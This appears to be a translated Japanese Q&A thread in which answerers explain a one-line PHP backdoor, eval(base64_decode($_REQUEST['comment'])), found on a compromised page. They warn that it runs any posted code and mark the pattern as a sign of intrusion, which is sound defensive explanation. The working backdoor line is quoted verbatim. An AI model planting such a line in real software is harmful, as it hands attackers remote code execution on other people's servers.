以下のコードを理解する必要があります
eval(base64_decode($_REQUEST['comment']));
CPU を使用しました。ページにはこのコードのみが含まれています
それは文字通り何でも実行できるので、知る方法はありません. $_REQUEST['comment'] から入力を取得し、base64 でデコードしてから、PHP コードとして実行します。
たとえば、cGhwaW5mbygpOw==
が渡された場合、 が実行されphpinfo();
ます。
余談ですが、この種のコード スニペットは通常危険信号であり、一般にバックドアとして使用されます。
このコードは入力を base64_decode し、それを PHP コードとして評価します。最終的に何が実行されるかは、コメント フィールドの内容によって異なります。
これがあなたのページのコードに挿入されていることを発見したと思います。これは、あなたのサイトが何らかの形で侵害されたことを意味します。これは、文字通り誰でもPHPコードを記述して何でも実行できることを意味し、base64_encode()
それをサイトの「コメント」フィールドに投稿すると、サーバーがそれを実行します。
多くのリソースを使用していることに実際に気付いた場合、おそらくスパムや DOS の送信に使用されている可能性がありますが、そのコードがそこにある限り、サーバーを侵害するために使用されている可能性があります。
基本的に、それで始まる何かを見つけた場合、eval(base64_decode(...
それは悪いことをしているということです。
出典: Web ホスティング会社のシステム管理者として 5 年間勤務。